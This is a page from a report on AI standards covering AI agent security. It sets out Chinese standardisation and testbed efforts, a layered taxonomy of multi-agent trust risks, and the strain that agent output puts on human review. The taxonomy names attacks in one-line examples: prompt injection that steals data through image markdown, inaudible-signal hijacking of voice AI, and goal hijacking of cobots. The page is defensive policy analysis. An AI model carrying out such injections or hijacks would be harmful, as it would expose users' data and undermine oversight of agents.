Page 86 - AI Standards for Global Impact: From Governance to Action

P. 86

AI Standards for Global Impact: From Governance to Action

13) In China’s AI Agents security initiatives, China's Ministry of Industry and Information
Technology's Technical Committee on AI (MIIT/TC1) launched a standard project about
general security requirements of AI Agents. And the China Academy of Information
and Communications Technology (CAICT) has built a comprehensive Trusted Agent
Testbed to support four major testing scenarios: protocol verification test, benchmark
test, collaborative test, and security test to advance standardization, lowering testing costs
and improving coordination efficiency.
14) While agents demonstrate remarkable strengths in goal-driven planning, adaptive
learning, and collaborative work, these three features may unleash unforeseen risks. First,
agents optimize for goals but lack human ethics/context, potentially leading to unintended
consequences (e.g. a smart home agent shuts off the refrigerator to save energy, ignoring
food preservation). Second, agents evolve with new data in unpredictable ways (e.g. a
companion agent disobeys rules to get candy for a user, prioritizing immediate requests
over parental instructions). Third, multi-agent systems interact in unforeseen patterns,
causing systemic chaos (e.g. traffic light agents and self-driving cars pursue conflicting
goals, worsening congestion)
15) Trust risks in multi-agent AI systems across three layers:

a) At the single-agent autonomy layer, risks involve excessive independence (e.g. the AI
scheme’s overreach in recovering welfare overpayments) and unauthorized actions.
b) At the tool/MCP connectivity layer, systems face adversarial attacks (e.g. Dolphin Attack
hijacking voice - controlled AI via inaudible signals) and data exposure (e.g. prompt
injection stealing data through image markdown).
c) At the multi-agent collaboration layer, threats include identity spoofing (e.g. malicious
drones posing as legitimate swarm members) and goal hijacking (e.g. man-in-the-
middle attacks on cobots to prioritize speed over quality).

16) Security standardization for multi-agent governance should start with single agent and
consider three levels: technical, governance, and ecosystem. In terms of Trust Ecosystem,
decentralized identity and consensus mechanisms can be used to build trust-by-design
collaboration foundations. In terms of governance, there is potential to adopt human-
machine collaboration, referencing frameworks like NIST AI RMF/ISO/IEC 42001 to
manage dynamic risks. In terms of technology, end-to-end security can be applied across
the agent lifecycle, aligning with policies (e.g. China’s AI content rules) and industry efforts
(e.g. Ant Group’s runtime security work).
17) We are currently on track for a “crisis of review”, since agents cannot be trusted to review
their own or other agents’ output or behaviours

o AI outputs are cheaper and faster than the human equivalent, but for important outputs
there is always going to be a human who is responsible for the outcome (e.g. a job
interviewer, corporate officer/signatory, board member, regulator). That person will
either be overwhelmed by outputs and become a bottleneck or will simply give rubber-
stamp approval (or be outcompeted by someone who does).
o The solution could be to move the review upstream of the action, expressing all the
constraints.

18) This could be specifically solved with: (a) an separable, auditable model of the relevant
system in which the agent acts, (b) a way of expressing safe or approved behaviour,
grounded within the context of the model, and (c) a requirement that the agent provide
evidence that its actions are compliant with the definition of safe within the scope of the
model.
o Combined, these three pieces become a meta-level requirement that gives a standard
for communicating constraints
o This is actually a generalization of how safety is tested in other engineering domains,
like civil engineering or pharmaceuticals. The {model, safety criteria, evidence} for
civil engineering are things like {physics models, load limits, design files+reports} and

81 82 83 84 85 86 87 88 89 90 91